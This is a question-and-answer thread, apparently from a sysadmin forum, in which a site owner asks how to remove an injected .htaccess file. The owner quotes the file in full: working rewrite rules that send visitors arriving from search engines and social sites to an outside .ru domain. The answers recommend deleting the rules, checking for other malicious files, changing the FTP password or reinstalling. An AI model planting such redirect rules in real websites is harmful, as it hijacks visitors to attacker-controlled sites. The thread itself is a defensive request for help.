# How to remove .htaccess virus

Tags: .htaccess, malware

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

All Subdomain folder with root folder they write a .htaccess file with this code

```
<IfModule mod_rewrite.c>                                                                                                                        
RewriteEngine On                                                                                                                        
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://prohibited-strictly.ru/access/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://prohibited-strictly.ru/access/index.php [R=301,L]
</IfModule>
```

It redirects all my subdirectories to .ru site.
Please help

Answer (score 1):

Depends heavily on what sort of virus you got. If your system was rooted you should reinstall.

There is no other safe way.

P.S. removing only the lines in your htaccess file is not enough. It will stop forwarding things to different domains right but you obviously have some sort of security leak.

Answer (score -1):

just removes the lines with 
RewriteRule & RewriteCond in front

*edit*

you might want to check you server & site for any malicious files... and change your FTP pasword